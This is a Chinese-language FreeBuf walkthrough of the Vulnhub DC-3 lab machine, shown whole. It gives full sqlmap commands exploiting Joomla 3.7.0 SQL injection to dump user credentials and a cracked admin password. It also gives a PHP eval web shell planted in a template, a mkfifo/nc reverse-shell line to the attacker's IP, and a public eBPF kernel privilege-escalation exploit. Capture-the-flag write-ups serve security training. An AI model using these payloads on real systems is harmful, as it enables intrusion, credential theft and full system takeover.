官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
- 关注
本文由
创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
Vulnhub--DC-3
一,部署方法
- 在官网上下载zip压缩包
- 下载到本地上解压缩后使用虚拟机导入.ova后缀的文件(在过程中出现问题不用理睬,点击重试即可)
- 配置网络,本人设置的是nat模式,这个看个人需求
- 打开靶机即可
二,靶机地址和描述
1. 下载地址
https://download.vulnhub.com/dc/DC-3-2.zip
2. 靶机描述
这次只有一个flag,一个入口点,没有任何线索!
三,测试
1. 信息收集
arp-scan -l
探测发现靶机的IP地址是:192.168.237.145
对靶机进行全面扫描
nmap -A -T4 -p- 192.168.237.145
发现靶机开启了80端口,web服务,而且CMS站点是joomla的。
访问站点
使用dirsearch爆破网站目录
dirsearch -u http://192.168.237.145/
在其中发现后台登录入口
因为是joomla的站点,这里使用专门针对于joomla站点的漏扫工具进行漏洞发现
2. 漏洞发现
需要在kali上下载joomscan
【joomscan是对joomla项目的开源漏扫工具】
sudo apt-get install joomscan
使用命令
Joomscan -h
查看joomscan的使用方法
Joomscan --url http://192.168.237.145
扫描出来的joomla版本是3.7.0
3.漏洞利用
使用
searchsploit joomla 3.7.0
查看joomla3.7.0的漏洞利用模块
发现SQL注入
查看joomla3.7.0的SQL注入的使用方法的文件
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
将””中的localhost切换为刚刚的网址
sqlmap-u"http://192.168.237.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
爆破出来五个数据库,这里发现的joomladb应该就是joomla站点的数据库。
这里继续爆破joomladb数据库的表
sqlmap -u "http://192.168.237.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
这里爆出joomladb数据库下有76个表,其中有一个#_users的表,猜测用户名和密码在其中存放,继续爆破#_users中的字段
sqlmap -u "http://192.168.237.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]
跑出来6个字段,这里继续爆破字段名称
sqlmap -u "http://192.168.237.145/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C "id,name,password,username" --dump -p list[fullordering]
爆破出来用户名和密码
可见密码是经过加密以后的,这里使用kali中的john工具进行解密
首先复制密码,创建文件
vi pass.txt
cat pass.txt
使用工具进行解密
John pass.txt
解密出来密码是snoopy
这里使用用户名/密码:admin/snoopy,尝试登录在信息收集阶段和漏洞发现时期爆出来的后台登录页面,
登录成功!
3. Getshell
查看全面功能点,寻找可插入代码的位置
终于找到可插入的位置,存在于Templates下
点击进去
点击error.php,写入一句话代码
<?php eval(@$_POST['hack']); ?>
访问页面
页面无显示,这里尝试使用蚁剑进行链接
成功链接!!!
使用kali机器开启监听
nc -lvvp 4444
然后打开蚁剑的虚拟终端
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.237.141 4444 >/tmp/f
点击回车,发现监听成功
输入
python -c ‘import pty;pty.spawn(“/bin/bash”)’;
变为交互式shell,可以看到当前用户所在的目录
输入
id
发现全是低权限,需要提权
4. 提权
使用
cat /etc/issue
查看当前的操作系统信息
使用
searchsploit Ubuntu 16.04
查看有没有可用的本地漏洞
只有这个可以用
使用
Find / -name “39772.txt”
搜索文件的位置
找到文件位置
使用
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
打开网页进行下载,发现提供的两个网页均无法正确打开,上网搜索过后,发现可以从这个网页进行下载
https://gitee.com/aaaddc/exploitdb-bin-sploits/blob/master/bin-sploits/39772.zip
首先将目录调整到/var/www/html下
使用
Wget Https://gitee.com/aaaddc/exploitdb-bin-sploits/blob/master/bin-sploits/39772.zip
成功下载
输入
Ls
查看是否下载成功
成功下载。
使用
Unzip 39772.zip
进行解压缩
【因为一些些的不可抗力的原因,zip无法解压缩。于是我们不妨迂回一下,就是有点点的小麻烦】
首先在物理机上下载下来,移动到kali攻击机上
使用
unzip exploitdb-bin-sploits-master.zip
ls
cd exploitdb-bin-sploits-master
Ls
Cd bin-sploits
Ls
这是一个合集,在其中寻找39772.zip进行解压缩,并且进入39772的目录,进行查看
Unzip 39772.zip
Cd 39772
Ls
在使用蚁剑将39772目录内的文件上传到/var/www/html的目录上
【好啦。我们再继续进行我们的提权过程吧!!】
使用
Tar -xvf exploit.tar
解压出来ebpf_mapfd_doubleput_exploit的目录,进入ebpf_mapfd_doubleput_exploit目录,查看目录内容
cd ebpf_mapfd_doubleput_exploit
Ls
发现compile.sh
使用
./compile.sh
Ls
./doubleput
Whoami
提权成功!!!!!!!
5. 找到最后的flag
使用
cd /root
Ls
Cat the-flag.txt
成功解题!!!
四,知识点总结
- nmap工具的使用
- dirsearch工具的使用
- Joomscan工具的使用【对joomla站点的漏扫工具】
- Sqlmap的使用
- John解密工具的使用
- 一句话木马和蚁剑的链接使用
- Kali的nc监听
- 根据内核系统版本的提权
已在FreeBuf发表 0 篇文章
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
- 0 文章数
- 0 关注者